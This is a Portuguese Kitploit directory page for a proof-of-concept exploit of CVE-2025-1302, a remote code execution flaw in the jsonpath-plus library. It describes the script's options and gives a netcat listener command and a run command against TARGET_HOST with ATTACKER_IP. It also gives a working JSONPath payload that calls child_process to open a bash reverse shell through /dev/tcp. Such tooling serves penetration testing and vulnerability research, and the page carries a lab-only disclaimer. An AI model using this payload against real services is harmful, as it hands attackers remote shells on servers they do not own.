Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-1302_jsonpath-plus_RCE — Exploit PoC e demonstração de servidor vulnerável para CVE-2025-1302 no jsonpath-plus. | Kitploit
Ferramentas/GitHubGitHub/abrewer251/cve-2025-1302_jsonpath-plus_rce
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleRed TeamingDesenvolvimento de Payloads
GitHubabrewer251/cve-2025-1302_jsonpath-plus_rce

CVE-2025-1302_jsonpath-plus_RCE

Exploit PoC e demonstração de servidor vulnerável para CVE-2025-1302 no jsonpath-plus.

Ver Repositório
11há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-1302 JSONPath-Plus RCE PoC

Nome do Script PoC: poc.py

Um script de prova de conceito para explorar CVE-2025-1302, que visa uma vulnerabilidade de RCE na biblioteca jsonpath-plus. Quando executado contra um endpoint de serviço vulnerável, o script tenta disparar execução remota de código através de um payload JSONPath e estabelecer uma reverse shell de volta para o atacante.


Funcionalidades

  • Métodos HTTP flexíveis: Suporta POST, GET ou AUTO (POST com fallback GET) via --method ou --no-fallback.
  • Payloads personalizados: Carregue um ou mais modelos de payload RCE JSONPath a partir de um arquivo, com modelagem de {ip} e {port}.
  • Payload padrão embutido: Se nenhum arquivo de payload for fornecido, usa um modelo completo de reverse shell bash.
  • Depuração verbosa: Exibe os corpos completos de requisição/resposta para tentativas POST e GET quando falham.
  • Indicadores de progresso: Exibe loops de delay e payload com barras de progresso tqdm.
  • Registro em log: Opcionalmente, salva todos os resultados em um arquivo JSON com --output.
  • Instalação

    1. Clone este repositório:

      root@kitploit:~
      git clone https://github.com/yourorg/jsonpath-rce-poc.git
      cd jsonpath-rce-poc
      
    2. Instale as dependências (requer Python 3.6+):

      root@kitploit:~
      pip install -r requirements.txt
      

    Uso

    1. Inicie um listener na sua máquina atacante (substitua a porta conforme necessário):

      root@kitploit:~
      nc -lvnp 9999
      
    2. Execute o PoC:

      root@kitploit:~
      python3 poc.py \
        --url http://TARGET_HOST:PORT/query \
        --ip ATTACKER_IP --port 9999 \
        [--payload-file payloads.txt] \
        [--delay 5] \
        [--method AUTO|POST|GET] \
        [--no-fallback] \
        [--output results.json]
      
    • --payload-file: Arquivo contendo um payload JSONPath por linha. Use os placeholders {ip} e {port}.
    • --delay: Segundos para esperar antes de enviar payloads (mostra contagem regressiva).
    • --method: Força POST, GET ou AUTO (padrão).
    • --no-fallback: Atalho para pular qualquer repetição GET (equivalente a --method POST).
    • --output: Caminho para salvar o registro JSON das tentativas.

    Exemplo de Arquivo de Payload

    root@kitploit:~
    $[?(@.constructor.constructor("require(\"child_process\").execSync(\"bash -i >& /dev/tcp/{ip}/{port} 0>&1\")")())]
    

    Contribuição

    1. Faça um fork do repositório e crie um branch de funcionalidade.
    2. Envie um pull request com suas alterações.

    Aviso Legal

    Use este script apenas em ambientes de laboratório controlados contra sistemas que você possui ou tem permissão explícita para testar. O uso indevido pode ser ilegal e antiético.

    Baixar ferramenta